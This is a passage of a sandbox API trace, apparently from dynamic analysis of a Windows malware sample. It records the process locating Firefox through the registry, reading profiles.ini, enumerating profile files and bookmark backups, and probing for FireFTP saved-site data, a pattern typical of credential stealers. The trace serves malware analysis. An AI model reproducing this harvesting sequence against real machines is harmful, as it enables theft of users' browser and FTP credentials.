dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.618] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f [0590.618] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.618] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.619] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c650 [0590.619] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.619] CloseHandle (hObject=0x660) returned 1 [0590.619] CloseHandle (hObject=0x4c8) returned 1 [0590.619] LocalFree (hMem=0x5e6108) returned 0x0 [0590.619] StrStrIW (lpFirst="profiles.ini", lpSrch="fireFTPsites.dat") returned 0x0 [0590.619] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.619] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfa4 | out: lpFindFileData=0x52dfa4) returned 0 [0590.619] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0590.619] LocalFree (hMem=0x5e6f98) returned 0x0 [0590.619] LocalFree (hMem=0x2ed2ba0) returned 0x0 [0590.619] LocalFree (hMem=0x2ed2150) returned 0x0 [0590.619] LocalFree (hMem=0x2ed2060) returned 0x0 [0590.619] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edd958 [0590.619] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", phkResult=0x52e24c | out: phkResult=0x52e24c*=0x5ac) returned 0x0 [0590.619] RegEnumKeyExW (in: hKey=0x5ac, dwIndex=0x0, lpName=0x2edd958, lpcchName=0x52e248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.619] RegCloseKey (hKey=0x5ac) returned 0x0 [0590.619] LocalFree (hMem=0x2edd958) returned 0x0 [0590.619] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.619] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x1, lpName=0x2edc8d0, lpcchName=0x52e284, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x52e284, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.619] lstrlenW (lpString="\\") returned 1 [0590.619] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0590.619] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0590.619] lstrlenW (lpString="Uninstall") returned 9 [0590.619] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned 46 [0590.619] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x5e6f98 [0590.619] LocalFree (hMem=0x2ed0148) returned 0x0 [0590.620] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", lpSrch="Firefox") returned="Firefox\\25.0 (en-US)\\Uninstall" [0590.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e224 | out: phkResult=0x52e224*=0x5ac) returned 0x0 [0590.620] RegQueryValueExW (in: hKey=0x5ac, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e20c, lpData=0x0, lpcbData=0x52e220*=0x0 | out: lpType=0x52e20c*=0x0, lpData=0x0, lpcbData=0x52e220*=0x0) returned 0x2 [0590.620] RegCloseKey (hKey=0x5ac) returned 0x0 [0590.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e1f8 | out: phkResult=0x52e1f8*=0x5ac) returned 0x0 [0590.620] RegQueryValueExW (in: hKey=0x5ac, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e1e0, lpData=0x0, lpcbData=0x52e1f4*=0x0 | out: lpType=0x52e1e0*=0x0, lpData=0x0, lpcbData=0x52e1f4*=0x0) returned 0x2 [0590.620] RegCloseKey (hKey=0x5ac) returned 0x0 [0590.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e1cc | out: phkResult=0x52e1cc*=0x0) returned 0x2 [0590.620] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edd958 [0590.620] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", phkResult=0x52e24c | out: phkResult=0x52e24c*=0x5ac) returned 0x0 [0590.620] RegEnumKeyExW (in: hKey=0x5ac, dwIndex=0x0, lpName=0x2edd958, lpcchName=0x52e248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.620] RegCloseKey (hKey=0x5ac) returned 0x0 [0590.620] LocalFree (hMem=0x2edd958) returned 0x0 [0590.620] LocalFree (hMem=0x5e6f98) returned 0x0 [0590.620] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x2, lpName=0x2edc8d0, lpcchName=0x52e284, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x52e284, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.620] RegCloseKey (hKey=0x664) returned 0x0 [0590.620] LocalFree (hMem=0x2edc8d0) returned 0x0 [0590.620] LocalFree (hMem=0x2ed0060) returned 0x0 [0590.620] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x2edb848, lpcchName=0x52e2c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x52e2c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.620] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.620] LocalFree (hMem=0x2edb848) returned 0x0 [0590.620] LocalFree (hMem=0x5d5258) returned 0x0 [0590.620] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x2, lpName=0x5e5080, lpcchName=0x52e2fc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x52e2fc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.620] lstrlenW (lpString="\\") returned 1 [0590.620] lstrlenW (lpString="Software\\Mozilla") returned 16 [0590.620] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0590.620] lstrlenW (lpString="Mozilla Firefox 25.0") returned 20 [0590.620] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0590.620] LocalAlloc (uFlags=0x40, uBytes=0xcc) returned 0x5977a0 [0590.620] LocalFree (hMem=0x5d3958) returned 0x0 [0590.620] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0", lpSrch="Firefox") returned="Firefox 25.0" [0590.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e29c | out: phkResult=0x52e29c*=0x2e4) returned 0x0 [0590.620] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e284, lpData=0x0, lpcbData=0x52e298*=0x0 | out: lpType=0x52e284*=0x0, lpData=0x0, lpcbData=0x52e298*=0x0) returned 0x2 [0590.620] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.621] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e270 | out: phkResult=0x52e270*=0x2e4) returned 0x0 [0590.621] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e258, lpData=0x0, lpcbData=0x52e26c*=0x0 | out: lpType=0x52e258*=0x0, lpData=0x0, lpcbData=0x52e26c*=0x0) returned 0x2 [0590.621] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.621] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e244 | out: phkResult=0x52e244*=0x0) returned 0x2 [0590.621] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edb848 [0590.621] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", phkResult=0x52e2c4 | out: phkResult=0x52e2c4*=0x2e4) returned 0x0 [0590.621] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x2edb848, lpcchName=0x52e2c0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="bin", lpcchName=0x52e2c0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.621] lstrlenW (lpString="\\") returned 1 [0590.621] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0590.621] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x597878 [0590.621] lstrlenW (lpString="bin") returned 3 [0590.621] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0590.621] LocalAlloc (uFlags=0x40, uBytes=0xd4) returned 0x2ed9860 [0590.621] LocalFree (hMem=0x597878) returned 0x0 [0590.621] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", lpSrch="Firefox") returned="Firefox 25.0\\bin" [0590.621] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e260 | out: phkResult=0x52e260*=0x664) returned 0x0 [0590.621] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e248, lpData=0x0, lpcbData=0x52e25c*=0x0 | out: lpType=0x52e248*=0x1, lpData=0x0, lpcbData=0x52e25c*=0x66) returned 0x0 [0590.621] LocalAlloc (uFlags=0x40, uBytes=0xe8) returned 0x2ed2ab0 [0590.621] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x0, lpData=0x2ed2ab0, lpcbData=0x52e25c*=0x66 | out: lpType=0x0, lpData=0x2ed2ab0*=0x43, lpcbData=0x52e25c*=0x66) returned 0x0 [0590.621] RegCloseKey (hKey=0x664) returned 0x0 [0590.621] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0590.621] lstrlenW (lpString="") returned 0 [0590.621] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") returned 50 [0590.621] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2060 [0590.621] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpSrch=".exe") returned=".exe" [0590.621] StrRChrIW (lpStart="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpEnd=0x0, wMatch=0x5c) returned="\\firefox.exe" [0590.621] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox") returned 38 [0590.621] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x63f8c8 [0590.621] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63f8c8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0590.621] lstrlenW (lpString="\\Mozilla\\Firefox\\") returned 17 [0590.621] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0590.621] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2150 [0590.621] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.621] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox")) returned 0x2010 [0590.621] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox" (normalized: "c:\\program files (x86)\\mozilla firefox")) returned 0x10 [0590.622] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.622] lstrlenW (lpString="") returned 0 [0590.622] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.622] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ba0 [0590.622] lstrlenW (lpString="profiles.ini") returned 12 [0590.622] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.622] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5d7c90 [0590.622] LocalAlloc (uFlags=0x40, uBytes=0xfe6a) returned 0x2edc8d0 [0590.622] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2eec748 [0590.622] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0590.622] CloseHandle (hObject=0x664) returned 1 [0590.622] GetPrivateProfileSectionNamesW (in: lpszReturnBuffer=0x2edc8d0, nSize=0xfde8, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpszReturnBuffer="General") returned 0x11 [0590.623] StrStrIW (lpFirst="General", lpSrch="Profile") returned 0x0 [0590.623] lstrlenW (lpString="General") returned 7 [0590.623] StrStrIW (lpFirst="Profile0", lpSrch="Profile") returned="Profile0" [0590.623] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault="", lpReturnedString=0x2eec748, nSize=0xfff, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/3y2joh8o.default") returned 0x19 [0590.623] GetPrivateProfileIntW (lpAppName="Profile0", lpKeyName="IsRelative", nDefault=1, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x1 [0590.624] lstrlenW (lpString="Profiles/3y2joh8o.default") returned 25 [0590.624] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0590.624] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x63d588 [0590.624] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.624] lstrlenW (lpString="\\*.*") returned 4 [0590.624] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.624] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63d6b0 [0590.624] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 0x57d1e0 [0590.624] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.624] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.624] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.624] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.624] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.624] lstrlenW (lpString="\\") returned 1 [0590.624] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.624] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.624] lstrlenW (lpString="addons.json") returned 11 [0590.624] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.624] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.624] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.624] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.625] CloseHandle (hObject=0x5ac) returned 1 [0590.625] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.625] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.625] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json") returned 0x58 [0590.625] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.625] CloseHandle (hObject=0x5ac) returned 1 [0590.625] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0590.625] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18 [0590.625] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0590.625] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.625] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.625] CloseHandle (hObject=0x4c8) returned 1 [0590.625] CloseHandle (hObject=0x5ac) returned 1 [0590.625] LocalFree (hMem=0x63bd28) returned 0x0 [0590.625] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.625] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfd8 | out: lpFindFileData=0x52dfd8) returned 1 [0590.625] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0590.625] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0590.626] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.626] lstrlenW (lpString="\\") returned 1 [0590.626] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.626] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.626] lstrlenW (lpString="bookmarkbackups") returned 15 [0590.626] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.626] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56cab0 [0590.626] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.626] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.626] lstrlenW (lpString="\\*.*") returned 4 [0590.626] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.626] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x5dbdf0 [0590.626] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*.*", lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 0x57ca60 [0590.626] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.626] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.626] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.626] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.626] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.626] lstrlenW (lpString="\\") returned 1 [0590.626] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.626] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbf38 [0590.626] lstrlenW (lpString="bookmarks-2017-06-30_5.json") returned 27 [0590.626] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0590.626] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5e6108 [0590.626] LocalFree (hMem=0x5dbf38) returned 0x0 [0590.626] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.626] CloseHandle (hObject=0x4c8) returned 1 [0590.626] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0590.626] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63f8c8 [0590.626] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x63f8c8, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") returned 0x78 [0590.626] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.626] CloseHandle (hObject=0x4c8) returned 1 [0590.626] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.626] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0590.626] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.626] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.627] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.627] CloseHandle (hObject=0x660) returned 1 [0590.627] CloseHandle (hObject=0x4c8) returned 1 [0590.627] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.627] LocalFree (hMem=0x5e6108) returned 0x0 [0590.627] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd60 | out: lpFindFileData=0x52dd60) returned 1 [0590.627] lstrlenW (lpString="\\") returned 1 [0590.627] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0590.627] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dbf38 [0590.627] lstrlenW (lpString="bookmarks-2017-07-26_5.json") returned 27 [0590.627] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0590.627] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5e6108 [0590.627] LocalFree (hMem=0x5dbf38) returned 0x0 [0590.627] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.627] CloseHandle (hObject=0x4c8) returned 1 [0590.627] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0590.627] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x63f8c8 [0590.627] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x63f8c8, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") returned 0x78 [0590.627] CreateFileW 